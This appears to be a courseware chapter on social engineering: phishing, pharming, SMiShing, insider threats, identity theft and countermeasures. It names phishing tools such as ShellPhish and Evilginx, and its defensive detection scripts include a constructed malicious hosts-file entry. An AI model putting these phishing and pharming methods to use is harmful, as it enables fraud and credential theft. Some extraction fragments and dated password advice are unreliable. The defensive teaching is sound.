A chain letter is a message offering free gifts, such as money and software, on the condition that the user forwards the email to a predetermined number of recipients. Common approaches used in chain letters are emotionally convincing stories, "get-rich-quick" pyramid schemes, spiritual beliefs, and superstitious threats of bad luck to the recipient if they "break the chain" and fail to pass on the message or simply refuse to read its content. Chain letters also rely on social engineering to spread.
Instant Chat Messenger
An attacker chats with selected online users via instant chat messengers and tries to gather their personal information such as date of birth or maiden name. They then use the acquired information to crack users' accounts.
Spam Email
Spam is irrelevant, unwanted, and unsolicited email designed to collect financial information such as social security numbers and network information. Attackers send spam messages to the target to collect sensitive information, such as bank details. Attackers may also send email attachments with hidden malicious programs such as viruses and trojans. Social engineers try to hide the file extension by giving the attachment a long filename.
Scareware
Scareware is a type of malware that tricks computer users into visiting malware-infested websites or downloading or buying potentially malicious software. Scareware is often seen in pop-ups that tell the target user that their machine has been infected with malware. These pop-ups convincingly appear as though they are coming from a legitimate source such as an antivirus company. Further, these pop-up ads always have a sense of urgency and tell the victim to quickly download the software if they want to get rid of the supposed virus.
Computer-based Social Engineering: Phishing
Phishing
Phishing is a technique in which an attacker sends an email or provides a link falsely claiming to be from a legitimate site to acquire a user's personal or account information. The attacker registers a fake domain name, builds a lookalike website, and then mails the fake website's link to users. When a user clicks on the email link, it redirects them to the fake webpage, where they are lured into sharing sensitive details such as their address and credit card information. Some of the reasons behind the success of phishing scams include users' lack of knowledge, being visually deceived, and not paying attention to security indicators.
The screenshot below is an example of an illegitimate email that claims to be from a legitimate sender. The email link redirects users to a fake webpage and asks them to submit their personal or financial details.
Examples of Phishing Emails
Source: https:/fits.tntech.edu
Today, most people use internet banking. Many people use internet banking for all their financial needs, such as online share trading and e-commerce. Phishing involves fraudulently acquiring sensitive information (like passwords and credit card details) by masquerading as a trusted entity.
The target receives an email that appears to be from the bank and requests the user to click on the URL or the link provided. If the user is tricked and provides their username, password, and other information, then the site forwards the information to the attacker, who will use it for nefarious purposes.
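The "registered fake domain plus lookalike website" pattern described above can be checked for mechanically before anyone clicks a link in a suspicious email. The Python script below is an added example written for this section, not code from the courseware: the trusted-domain allowlist, the `.example` hostnames, the homoglyph table and the two-edit threshold are constructed assumptions, and the registrable-domain split is simplified to the last two labels rather than a public-suffix lookup.

```python
"""Flag links whose host imitates a trusted domain (added example, constructed data)."""
from urllib.parse import urlparse

# Constructed allowlist of domains the organization really uses (assumption).
TRUSTED_DOMAINS = {"ximbank.example", "intranet.example"}

# Digits commonly substituted for similar-looking letters: 0/o, 1/l, 3/e, 5/s, 7/t.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

# Assumed threshold: a brand label within this many edits counts as a lookalike.
MAX_EDITS = 2


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def host_labels(url: str) -> list:
    """Lower-cased DNS labels of the URL's host, left to right."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    return host.split(".") if host else []


def registrable_domain(labels: list) -> str:
    # Assumption: the registrable domain is the last two labels. Real code
    # would consult the public suffix list to handle suffixes like co.uk.
    return ".".join(labels[-2:])


def normalize_label(label: str) -> str:
    """Undo the cheap disguises: hyphens and digit-for-letter swaps."""
    return label.replace("-", "").translate(HOMOGLYPHS)


def classify_link(url: str) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for the link's destination host."""
    if "@" in urlparse(url).netloc:
        # user@host form: the text before '@' is not the destination
        return "lookalike"
    labels = host_labels(url)
    if not labels:
        return "unknown"
    if registrable_domain(labels) in TRUSTED_DOMAINS:
        return "trusted"
    brands = {d.split(".")[0] for d in TRUSTED_DOMAINS}
    # A trusted name used as a subdomain or inner label of some other domain
    if any(normalize_label(lab) in brands for lab in labels[:-2]):
        return "lookalike"
    # The registrable label is a near miss of a trusted brand name
    candidate = normalize_label(labels[-2] if len(labels) >= 2 else labels[-1])
    if any(levenshtein(candidate, b) <= MAX_EDITS for b in brands):
        return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for link in ("https://ximbank.example/login", "https://xirnbank.example/verify",
                 "https://ximbank.example.secure-login.example/", "https://news.example/story"):
        print(f"{classify_link(link):9s} {link}")
```

A result of `unknown` is not a verdict of safety; it only means the host neither matches nor imitates a domain in the allowlist, so the usual sender-authentication and URL-reputation checks still apply.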
Figure 9.3: Screenshot showing a phishing email
Figure 9.4: Screenshot showing a phishing email
Types of Phishing
Spear Phishing
Instead of sending out thousands of emails, some attackers opt for "spear phishing" and use specialized social engineering content directed at a specific employee or small group of employees in an organization to steal sensitive data such as financial information and trade secrets. Spear phishing messages seem to come from a trusted source with an official-looking website. The email also appears to be from an individual from the recipient's company, generally someone in a position of authority. In reality, the message is sent by an attacker attempting to obtain critical information about a specific recipient and their organization, such as login credentials, credit card details, bank account numbers, passwords, confidential documents, financial information, and trade secrets. Spear phishing generates a higher response rate compared to a normal phishing attack, as it appears to be from a trusted company source.
Whaling
A whaling attack is a type of phishing that targets high-profile executives like CEOs, CFOs, politicians, and celebrities who have complete access to confidential and highly valuable information. It is a social engineering trick in which the attacker tricks the victim into revealing critical corporate and personal information (like bank account details, employee details, customer information, and credit card details), generally through email or website spoofing. Whaling is different from a normal phishing attack; the email or website used for the attack is carefully designed, usually targeting someone in the executive leadership.
Pharming
Pharming is a social engineering technique in which the attacker executes malicious programs on a victim's computer or server, so that when the victim enters any URL or domain name, the victim's traffic is automatically redirected to an attacker-controlled website. This attack is also known as "Phishing without a Lure." The attacker steals confidential information like credentials, banking details, and other information related to web-based services.
A pharming attack can be performed in two ways: DNS cache poisoning and host file modification.
DNS Cache Poisoning:
o The attacker performs DNS cache poisoning on the targeted DNS server.
o The attacker modifies the IP address of the target website "www.targetwebsite.com" to that of a fake website "www.hackerwebsite.com."
o When the victim enters the target website's URL in the browser's address bar, a request is sent to the DNS server to obtain the IP address of the target website.
o The DNS server returns a fake IP address that has already been modified by the attacker.
o Finally, the victim is redirected to the fake website.
Host File Modification:
o An attacker sends malicious code as an email attachment.
o When the user clicks on the attachment, the code executes and modifies the local hosts file on the user's computer.
o When the victim enters the target website's URL in the browser's address bar, the compromised hosts file automatically redirects the user's traffic to the fraudulent website controlled by the hacker.
Pharming attacks can also be performed using malware like Trojan horses or worms.
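The host file modification steps above have a direct defender-side check: audit the local hosts file for non-loopback mappings that were never approved, and in particular for names that should only ever resolve through DNS. The Python below is an added example for this section, not code from the courseware; the hosts content, the allowlist and the watchlist are constructed, and `www.targetwebsite.com` is reused from the page's own example.

```python
"""Audit a hosts file for pharming-style overrides (added example, constructed data)."""
import ipaddress

# Constructed hosts file content; the last entry imitates a pharming override.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
# build infrastructure, deliberately pinned (see APPROVED below)
10.0.0.5        build-server.corp.example
192.0.2.10      www.targetwebsite.com targetwebsite.com   # injected by malware
"""

# Constructed allowlist of (address, hostname) pairs the organization pins on purpose.
APPROVED = {("10.0.0.5", "build-server.corp.example")}

# Constructed watchlist: names (banking, SSO, etc.) that must never be pinned locally.
WATCHED = {"www.targetwebsite.com", "targetwebsite.com"}


def parse_hosts(text: str) -> list:
    """Return (ip, hostname) pairs, one per name, skipping comments and junk lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                           # not a hosts entry at all
        for name in parts[1:]:
            entries.append((str(ip), name.lower()))
    return entries


def audit_hosts(text: str) -> list:
    """Return (hostname, ip, reason) findings for suspicious mappings."""
    findings = []
    for ip, name in parse_hosts(text):
        if ipaddress.ip_address(ip).is_loopback:
            continue                           # localhost mappings are expected
        if name in WATCHED:
            findings.append((name, ip, "watched name pinned locally (pharming pattern)"))
        elif (ip, name) not in APPROVED:
            findings.append((name, ip, "non-loopback mapping not in allowlist"))
    return findings


if __name__ == "__main__":
    for name, ip, reason in audit_hosts(SAMPLE_HOSTS):
        print(f"{name:28s} -> {ip:12s} {reason}")
```

On a real host the same function is run over the contents of `/etc/hosts` or `%SystemRoot%\System32\drivers\etc\hosts`, ideally from an endpoint agent that also alerts on any write to that file. The DNS cache poisoning branch needs a different control, since the tampering happens off the endpoint: compare the answer from the configured resolver against an independent resolver, or validate responses with DNSSEC.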
Spimming
SPIM (Spam over Instant Messaging) exploits instant messaging platforms and uses IM as a tool to spread spam. A person who generates spam over IM is called a Spimmer. Spimmers generally make use of bots (an application that executes automated tasks over the network) to harvest instant message IDs and forward spam messages to them. SPIM messages, like email spam, generally include advertisements and malware as an attachment or embedded hyperlink. The user clicks the attachment and is redirected to a malicious website that collects financial and personal information like credentials, bank account, and credit card details.
Phishing Tools
Phishing tools can be used by attackers to generate fake login pages to capture usernames and passwords, send spoofed emails, and obtain the victim's IP address and session cookies. This information can further be used by the attacker, who will use it to impersonate a legitimate user and launch further attacks on the target organization.
▪ ShellPhish
Source: https://github.com
ShellPhish is a phishing tool used to phish user credentials from various social networking platforms such as Instagram, Facebook, Twitter, and LinkedIn. It also displays the victim system's public IP address, browser information, hostname, geolocation, and other information.
Figure 9.6: Screenshot of ShellPhish
Screenshot showing the output of ShellPhish
Some additional phishing tools are listed below:
▪ BLACKEYE (https://github.com)
▪ Phishx (https://github.com)
▪ Modlishka (https://github.com)
▪ Trape (https://github.com)
▪ Evilginx (https://github.com)
Mobile-based Social Engineering: Publishing Malicious Apps and Repackaging Legitimate Apps
Publishing Malicious Apps
In mobile-based social engineering, the attacker performs a social engineering attack using malicious mobile apps. The attacker first creates a malicious application with attractive features, such as a gaming application, and publishes it on major application
(Figure: an attacker publishes a malicious gaming application to an application store)
Repackaging Legitimate Apps
Sometimes malware can be hidden within legitimate apps. A legitimate developer creates legitimate gaming applications. Platform vendors create centralized marketplaces to allow mobile users to conveniently browse and install these games and apps. Usually, developers submit gaming applications to these marketplaces, making them available to thousands of mobile users. A malicious developer downloads a legitimate game, repackages it with malware, and uploads it to a third-party application store. Once a user downloads the malicious application, the malicious program installed on the user's mobile device collects the user's information and sends it to the attacker.
Figure 9.9: Repackaging legitimate apps (legitimate developer, application store, malicious developer, third-party app store, end user downloads the malicious gaming app)
Mobile-based Social Engineering: Fake Security Applications
Figure 9.10: Fake security applications (the user logs on to their bank account; a message appears telling the user to download an application to their phone; the user's credentials are sent to the attacker)
Mobile-based Social Engineering: SMiShing (SMS Phishing)
Sending SMS is another technique used by attackers in performing mobile-based social engineering. In SMiShing (SMS Phishing), the SMS text messaging system is used to lure users into taking instant action such as downloading malware, visiting a malicious webpage, or calling a fraudulent phone number. SMiShing messages are crafted to provoke an instant action from the victim, requiring them to divulge their personal information and account details.
Consider Tracy, a software engineer working in a reputed company. She receives an SMS ostensibly from the security department of XIM Bank. It claims to be urgent, and the message says that Tracy should call the phone number listed in the SMS immediately. Worried, she calls to check on her account, believing it to be an authentic XIM Bank customer service phone number. A recorded message asks Tracy to provide her credit or debit card number, as well as her password. Tracy believes it is a genuine message and shares the sensitive information.
Sometimes a message merely claims that the user has won money or has been selected as a lucky winner and that they need to pay a nominal fee and share their email address, contact number, or other information.
Figure 9.11: SMiShing (SMS Phishing)
Module Flow: Social Engineering Concepts; Social Engineering Techniques; Insider Threats; Impersonation on Social Networking Sites; Identity Theft; Countermeasures
Insider Threats / Insider Attacks
Insider Threats
An insider is any employee (trusted person) who has access to the critical assets of an organization. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization's information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. Insider attacks may cause great loss to the company. Further, they are dangerous because they are easy to launch and difficult to detect.
Insider attacks are generally performed by:
▪ Privileged Users: Attacks may come from the most trusted employees of the company, such as managers and system administrators, who have access to the company's confidential data and a higher probability of misusing the data, either intentionally or unintentionally.
▪ Disgruntled Employees: Attacks may come from unhappy employees or contract workers. Disgruntled employees, who intend to take revenge on the company, first acquire information and then wait for the right time to compromise the organization's resources.
▪ Terminated Employees: Some employees take valuable information about the company with them when terminated. These employees access the company's data after termination using backdoors, malware, or their old credentials if they are not disabled.
Reasons for Insider Attacks
▪ Financial Gain: An attacker performs an insider attack mainly for financial gain. The insider sells the company's sensitive information to its competitor, steals a colleague's financial details for personal use, or manipulates the company's financial records or those of its personnel.
▪ Steal Confidential Data: A competitor may inflict damage upon the target organization, steal critical information, or even put them out of business just by finding a job opening, preparing someone to
▪ Become Future Competitor: Current employees may plan to start their own competing business and, by using the company's confidential data, these employees may access the system to steal or alter the company's client list.
▪ Perform Competitor's Bidding: Due to corporate espionage, even the most honest and trustworthy employees can be coerced into revealing the company's critical information through bribery or blackmail.
▪ Public Announcement: A disgruntled employee may want to make a political or social statement and so leaks or damages the company's confidential data.
Insider Threat Statistics
Source: https://www.observeit.com
Although malicious intent is a serious factor for organizational security, according to a 2018 Cost of Insider Threats Study, an attack caused by employee or contractor negligence is costlier than theft by a criminal or malicious insider and credential theft:
Figure 9.12: Graph showing insider threat statistics (average annualized cost for three profiles: employee or contractor negligence, criminal and malicious insider, credential theft)
Types of Insider Threats
(Slide: a disgruntled or terminated employee who steals or destroys the company's data or networks intentionally by inducing malware; insiders who are uneducated on potential security threats or who simply bypass general security procedures to meet workplace efficiency; harmful insiders who use their technical knowledge to identify; an insider with access to critical assets of an organization who is compromised by an outside threat actor)
There are four types of insider threats. They are:
▪ Malicious Insider
Why are Insider Attacks Effective?
Insider attacks are effective because:
▪ Insider attacks can go undetected for years, and remediation is expensive.
▪ Insider attacks are easy to launch.
▪ Preventing insider attacks is difficult; an inside attacker can easily succeed.
▪ It is very difficult to differentiate harmful actions from the employee's regular work. It is hard to identify whether employees are performing malicious activities or not.
▪ Even after malicious activity is detected, the employee may refuse to accept responsibility and claim it was a mistake.
▪ It is easy for employees to cover their actions by editing or deleting logs to hide their malicious activities.
Example of Insider Attack: Disgruntled Employee
Most cases of insider abuse can be traced to individuals who are introverts, incapable of managing stress, experiencing conflict with management, frustrated with their job or office politics, craving respect or promotion, transferred, demoted, or issued an employment termination notice, among other reasons. Disgruntled employees may pass company secrets and intellectual property to competitors for monetary gain, thus harming the organization.
Disgruntled employees can use steganography programs to hide company secrets and later send the information to competitors as an innocuous-looking message such as a picture, image, or sound file using a work email account. No one suspects them because the attacker hides the stolen sensitive information in the picture or image file.
Figure 9.13: Example of insider attack
Behavioral Indications of an Insider Threat
Changes in Network Usage Patterns
Changes in the network patterns of the network-specific protocols, size of the packets, sources and destinations, frequency of user application sessions, and bandwidth usage can indicate malicious activity.
Multiple Failed Login Attempts
The insider can try to log in to unauthorized systems or applications by brute force. So, multiple failed attempts may indicate an insider threat.
Behavioral and Temporal Changes
Deviation from established behavior and temporal changes in employee behavior such as spending capacity, frequent travel, anger management issues, constant quarrels with colleagues, and lethargy in performing work are some of the fraud indicators.
Unusual Time and Location of Access
Any mismatch in the timeline of an event can be suspicious and may indicate an insider threat. For example, if activities are logged on employee systems in their absence.
Missing or Modified Critical Data
Disgruntled employees can modify or delete sensitive data to damage the reputation of the organization.
Unauthorized Download or Copying of Sensitive Data
Insiders use legitimate and malicious tools to extract data from the organization's perimeter. Insiders can install malware, trojans, and backdoors to steal information.
Sending Sensitive Information to Personal Email Account
Insiders may send critical organizational information to their personal email accounts with malicious intent.
Logging of Different User Accounts from Different Systems
Unusual times of access combined with a change in the IP address of the system used to log in to the account may represent malicious activities.
Temporal Changes in Revenue or Expenditure
Unexpected and unexplained changes in the financial status of an employee signify an income generated from external sources. The organization should audit their financial reports to identify whether the employee was involved in any malicious activities.
Unauthorized Access to Physical Assets
Complaint on Sensitive Data Leak
Information or complaints regarding sensitive data leaks can represent an insider attack. Check for customer reviews and concerns to identify anomalies and analyze them to identify the insider.
Abnormal Access of Systems and User Accounts
The mismatch between the systems assigned and user accounts used to access the systems may indicate an insider threat.
Irresponsible Social Media Behavior
Insiders may attempt to create a negative impact on the organization by posting unnecessary information on social media websites.
Attempt to Access Restricted Zones
Employees with malicious intent may try to access restricted areas of the organization to collect sensitive information.
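Three of the indicators above (multiple failed login attempts, unusual time of access, and a change of source IP address for the same account) can be turned directly into detection logic over authentication logs. The Python below is an added example for this section, not code from the courseware; the log format, the sample entries, the user names, and the thresholds (five failures within ten minutes, business hours 08:00 to 18:00) are all constructed assumptions.

```python
"""Detect three behavioral insider-threat indicators in auth logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log line format: "<ISO timestamp> user=<name> src=<ip> result=OK|FAIL".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>OK|FAIL)$"
)

# Constructed sample log (not from any real system). jdoe shows all three patterns.
SAMPLE_LOG = """\
2020-03-02T09:05:11 user=asmith src=10.0.0.14 result=OK
2020-03-02T22:41:03 user=jdoe src=10.0.0.21 result=FAIL
2020-03-02T22:41:09 user=jdoe src=10.0.0.21 result=FAIL
2020-03-02T22:41:15 user=jdoe src=10.0.0.21 result=FAIL
2020-03-02T22:41:22 user=jdoe src=10.0.0.21 result=FAIL
2020-03-02T22:41:30 user=jdoe src=10.0.0.21 result=FAIL
2020-03-02T22:41:38 user=jdoe src=10.0.0.21 result=OK
2020-03-02T22:50:02 user=jdoe src=198.51.100.7 result=OK
this line is malformed and must be skipped
2020-03-03T10:15:44 user=asmith src=10.0.0.14 result=OK
"""


def parse_log(text: str) -> list:
    """Parse log lines into event dicts sorted by time; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "user": m["user"],
            "src": m["src"],
            "ok": m["result"] == "OK",
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_indicators(events: list, fail_threshold: int = 5,
                      window: timedelta = timedelta(minutes=10),
                      business_hours: tuple = (8, 18)) -> list:
    """Return (user, indicator, detail) tuples, at most one per indicator per user."""
    alerts = []
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    for user, evs in by_user.items():
        # 1. Multiple failed login attempts inside a sliding window (brute-force pattern)
        fails = [e["ts"] for e in evs if not e["ok"]]
        for i, start in enumerate(fails):
            n = sum(1 for t in fails[i:] if t - start <= window)
            if n >= fail_threshold:
                alerts.append((user, "multiple_failed_logins", f"{n} failures within {window}"))
                break
        # 2. Successful access outside business hours (unusual time of access)
        for e in evs:
            if e["ok"] and not (business_hours[0] <= e["ts"].hour < business_hours[1]):
                alerts.append((user, "off_hours_access", e["ts"].isoformat()))
                break
        # 3. Same account logging in from a different source IP shortly afterwards
        oks = [e for e in evs if e["ok"]]
        for a, b in zip(oks, oks[1:]):
            if a["src"] != b["src"] and b["ts"] - a["ts"] <= window:
                alerts.append((user, "source_ip_change", f"{a['src']} -> {b['src']}"))
                break
    return alerts


if __name__ == "__main__":
    for user, kind, detail in detect_indicators(parse_log(SAMPLE_LOG)):
        print(f"{user:8s} {kind:24s} {detail}")
```

Each indicator on its own produces false positives (on-call staff work at night, laptops change addresses); the value is in correlating them per account, which is why the function groups events by user before applying any rule.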
Impersonation on Social Networking Sites
Today social networking sites are widely used by many people, allowing them to build online profiles and share information and media such as pictures, blog entries, and music clips. Thus, it is relatively easier for an attacker to impersonate someone. The victim is likely to trust the attacker and eventually reveal information that would help them gain access to the system. This section describes how attackers perform social engineering through impersonation using various social networking sites such as Facebook, LinkedIn, and Twitter, and highlights the risks these sites pose to corporate networks.
Social Engineering through Impersonation on Social Networking Sites
As social networking sites such as Facebook, Twitter, and LinkedIn are widely used, attackers coopt them as a vehicle for impersonation. There are two ways an attacker can perform impersonation on social networking sites:
▪ By creating a fictitious profile of the victim on the social media site
▪ By stealing the victim's password or indirectly gaining access to the victim's social media account
Social networking sites are a treasure trove for attackers because people share their personal and professional information on these sites, such as name, address, mobile number, date of birth, project details, job designation, company name, and location. The more information people share on a social networking site, the more likely it is that an attacker can impersonate them to launch attacks against them, their associates, or their organization. They may also try to join the target organization's employee groups to extract corporate data.
In general, the information attackers gather from social networking sites includes organization details, professional details, contacts and connections, and personal details, which they then use to execute other forms of social engineering attacks.
Impersonation on Facebook
Source: https://www.facebook.com
Facebook is a well-known social networking site that connects people. It is widely used between friends who share comments and upload links, photos, and videos. To impersonate users on Facebook, attackers use nicknames or aliases instead of their real names. They create fake accounts and try to add "Friends" to view others' profiles and obtain critical and valuable information.
▪ Users join the group and provide their credentials such as date of birth, educational and employment backgrounds, or spouses' names.
▪ Using the details of any one of the employees, an attacker can compromise a secured facility to gain access to the building.
Attackers create a fake account and scan the details on the profile pages of various targets on social networking sites such as LinkedIn and Twitter to engage in spear phishing, impersonation, and identity theft.
Social Networking Threats to Corporate Networks
Before sharing data on a social networking site, or enhancing their private and corporate channels, groups, or profiles, users should be aware of the following social or technical security risks:
▪ Data Theft: Social networking sites are huge databases accessed by many people worldwide, increasing the risk of information exploitation.
▪ Involuntary Data Leakage: In the absence of a strong policy that sets clear lines between personal and corporate content, employees may unknowingly post sensitive data about their company on social networking sites, which might help an attacker to launch an attack on the target organization.
▪ Targeted Attacks: Attackers use the information posted on social networking sites to launch targeted attacks on specific users or companies.
▪ Network Vulnerability: All social networking sites are subject to flaws and bugs such as login issues and Java vulnerabilities, which attackers could exploit. This could, in turn, lead to the leakage of confidential information related to the target organization's network.
▪ Spam and Phishing: Employees using work e-mail IDs on social networking sites will probably receive spam and become targets of phishing attacks, which could compromise the organization's network.
▪ Modification of Content: In the absence of proper security measures and efforts to preserve identity, channels, blogs, groups, profiles, and other platforms can be spoofed.
▪ Malware Propagation: Social networking sites are ideal platforms for attackers to spread viruses, bots, worms, trojans, spyware, and other malware.
▪ Business Reputation: Attackers can falsify information about an organization or an employee on social networking sites, resulting in loss of reputation.
▪ Infrastructure and Maintenance Costs: Using social networking sites entails added infrastructure and maintenance resources for organizations to ensure that their defensive layers are effective safeguards.
▪ Loss of Productivity: Organizations must monitor employees' network activities to maintain security and ensure that such activities do not misuse the system and company
Identity Theft
Identity theft is a crime in which an imposter steals your personally identifiable information such as name, credit card number, social security or driver's license numbers, etc. to commit fraud or other crimes. Attackers can use identity theft to impersonate employees of a target organization and physically access facilities.
(Slides: Types of Identity Theft; Common Techniques Attackers Use to Obtain Personal Information for Identity Theft, including pretexting, theft of wallets, computers, laptops, and cell phones, hacking, and mail theft and rerouting; Indications of Identity Theft)
Identity Theft
Identity theft is a problem that many consumers face today. In the United States, some state legislators have imposed laws restricting employers from requiring employees to provide their SSNs (Social Security Numbers) during recruitment. Identity theft frequently figures in news reports. Companies should be informed about identity theft so that they do not endanger their own anti-fraud initiatives. This section discusses types of identity theft, common techniques attackers use to obtain personal information for identity theft, and various indications of identity theft.
The Identity Theft and Assumption Deterrence Act of 1998 defines identity theft as the illegal use of someone's identification. Identity theft occurs when someone steals others' personally identifiable information for fraudulent purposes. Attackers illegally obtain personally identifying information to commit fraud or other criminal acts.
Types of personally identifiable information stolen by identity thieves:
▪ Name
▪ Bank account number
▪ Home and office address
▪ Credit card information
▪ Social security number
▪ Credit report
▪ Phone number
▪ Date of birth
▪ Driving license number
▪ Passport number
The attacker steals people's identity for fraudulent purposes such as:
▪ To open new credit card accounts in the name of the user without paying the bills
▪ To open a new phone or wireless account in the user's name, or to run up charges on their existing account
▪ To use the victims' information to obtain utility services such as electricity, heating, or cable TV
▪ To open bank accounts with the intention of writing bogus checks using the victim's information
Types of Identity Theft
Criminal Identity Theft
This is one of the most common and most damaging types of identity theft. A criminal uses someone else's identity to escape criminal charges: when they are caught or arrested, they provide the assumed identity. The best way to protect against criminal identity theft is to keep all personal information secure, which includes following safe Internet practices and being cautious of "shoulder surfers."
Financial Identity Theft
This type of identity theft occurs when a victim's bank account or credit card information is stolen and illegally used by a thief. The thief can max out a credit card and withdraw money from the account, or can use the stolen identity to open a new account, apply for new credit cards, and take out loans. The information required to break into the victim's account and steal their information is obtained through viruses, phishing attacks, or data breaches.
Driver's License Identity Theft
This type of identity theft is the easiest, as it requires little sophistication. A person can lose their driver's license, or it can easily be stolen. Once it falls into the wrong hands, the perpetrator can sell the stolen driver's license or misuse it by committing traffic violations of which the victim is unaware and therefore fails to pay the fines for, ending up with their license suspended or revoked.
Insurance Identity Theft
Insurance identity theft is closely related to medical identity theft. It takes place when a perpetrator unlawfully takes the victim's medical information to access their insurance for medical treatment. Its effects include difficulties in settling medical bills, higher insurance premiums, and probable trouble in acquiring future medical coverage.
Medical Identity Theft
This is the most dangerous type of identity theft, where the perpetrator uses the victim's name or information without the victim's consent or knowledge to obtain medical products and claim health insurance or healthcare services. Medical identity theft results in erroneous entries in the victim's medical records, which could lead to false diagnoses and life-threatening decisions by doctors.
Tax Identity Theft
This type of identity theft occurs when the perpetrator steals the victim's Social Security Number to file fraudulent tax returns and obtain fraudulent tax refunds. It creates difficulties for the victim in accessing their legitimate tax refunds and results in a loss of funds. Phishing emails are one of the main tricks used by criminals to steal a target's information. Therefore, protection from such identity theft includes the adoption of safe Internet practices.
Identity Cloning and Concealment
This type of identity theft encompasses all forms of identity theft where the perpetrators attempt to impersonate someone else simply in order to hide their own identity. These perpetrators could be illegal immigrants, those hiding from creditors, or simply those who want to become "anonymous."
Synthetic Identity Theft
Techniques Attackers Use to Obtain Personal Information
Theft of wallets, laptops, computers, cell phones, backup media, and other sources of personal information
Physical theft is common. Attackers steal hardware from places such as hotels and recreational places such as clubs, restaurants, parks, and beaches. Given adequate time, they can recover valuable data from these sources.
Internet Searches
Attackers can gather a considerable amount of sensitive information via legitimate Internet sites, using search engines such as Google, Bing, and Yahoo.
Social Engineering
Social engineering is the art of manipulating people into performing certain actions or divulging personal information, accomplishing the attacker's task without using cracking methods.
Dumpster Diving and Shoulder Surfing
Attackers rummage through household garbage and the trash bins of organizations, ATM centers, hotels, and other places to obtain personal and financial information for fraudulent purposes. Criminals may also find user information by glancing at documents, observing personal identification numbers (PINs) typed into automatic teller machines (ATMs), or by overhearing conversations.
Phishing
The "fraudster" may pretend to be from a financial institution or other reputable organization and send spam or pop-up messages to trick users into revealing their personal information.
Skimming
Skimming refers to stealing credit or debit card numbers by using special storage devices called skimmers or wedges when processing the card.
Pretexting
Fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses. They rely on "smooth-talking" to win the trust of an individual and get them to reveal sensitive information.
Pharming
Pharming, also known as domain spoofing, is an advanced form of phishing in which the attacker subverts the mapping between a legitimate domain name and the IP address of its real server. The attacker may use DNS cache poisoning (replacing the legitimate address in a resolver's cache with the address of a rogue server) to do so. When users type in the legitimate Internet address, they are redirected to a rogue website that resembles the original.
Hacking (compromising a user's system)
Attackers may compromise user systems and routers using listening devices such as sniffers and scanners. They gain access to an abundance of data, decrypt it (if necessary), and use it for identity theft.
Keyloggers and Password Stealers (Malware)
An attacker may infect the user's computer with trojans, viruses, or other malware and then record and collect the user's keystrokes to steal passwords, usernames, and other sensitive information of personal, financial, or business import. Attackers may also use emails to send fake forms, such as Internal Revenue Service (IRS) forms, to gather information from their victims.
Wardriving
Attackers search for unsecured Wi-Fi wireless networks from moving vehicles, using laptops, smartphones, or PDAs. Once they find unsecured networks, they access any sensitive information stored on the devices of the users on those networks.
Mail Theft and Rerouting
Often, mailboxes contain bank documents (credit cards or account statements), administrative forms, and other important correspondence. Criminals use this information to obtain credit card information or to reroute the mail to a new address.
Indications of Identity Theft
People do not realize that they are the victim of identity theft until they experience some unknown and unauthorized issues as a result of the theft. Therefore, it is of paramount importance that people watch out for the warning signs that their identities have been compromised. Listed below are some of the signs of identity theft:
- Unfamiliar charges to your credit card that you do not recognize
- No longer receiving credit card, bank, or utility statements
- Creditors call asking about an unknown account in your name
- There are numerous traffic violations under your name that you did not commit
- You receive charges for medical treatment or services you never received
- There is more than one tax return filed under your name
- Being denied access to your own account and unable to take out loans or use other services
- Not receiving electricity, gas, water, or other service bills due to stolen mail
- Sudden changes in your personal medical records showing a condition you do not suffer from
Some additional indications of identity theft are as follows:
- Getting a notification that your information was compromised or misused by a data breach in a company where you are an employee or have an account
- An inexplicable cash withdrawal from your bank account
Countermeasures
Social engineers exploit human behavior (such as manners, enthusiasm toward work, laziness, or naivete) to gain access to the targeted company's information resources. Social engineering attacks are difficult to guard against, as the victim might not be aware that he or she has been deceived. They are very much like the other kinds of attacks used to extract a company's valuable data. To guard against social engineering attacks, a company needs to evaluate the risk of different kinds of attacks, estimate possible losses, and spread awareness among its employees.
This section deals with countermeasures that an organization can implement to be more secure against social engineering attacks.
Social Engineering Countermeasures
Attackers implement social engineering techniques to trick people into revealing organizations' confidential information. They use social engineering to perform fraud, identity theft, industrial espionage, and other disreputable behaviors. To guard against social engineering attacks, organizations must develop effective policies and procedures; however, merely developing them is not enough.
To be truly effective, an organization should:
- Disseminate policies among employees and provide proper education and training. Specialized training benefits employees in higher-risk positions against social engineering threats.
- Obtain employee signatures on a statement acknowledging that they understand the organization's policies.
- Define the consequences of policy violations.
The main objectives of social engineering defense strategies are to create user awareness, robust internal network controls, and security policies, plans, and processes. Official security policies and procedures help employees or users make the right security decisions. They should include the following safeguards:
Password Policies
- Change passwords regularly.
- Avoid passwords that are easy to guess. It is possible to guess passwords from answers to social engineering questions such as "Where were you born?", "What is your favorite movie?", or "What is your pet's name?"
- Block user accounts if a user exceeds a certain number of failed attempts to guess a password.
- Choose long (minimum of 6-8 characters) and complex passwords (using various alphanumeric and special characters).
- Do not disclose passwords to anyone.
Security policies often include advice on proper password management, for example:
- Avoid sharing a computer account.
- Avoid using the same password for different accounts.
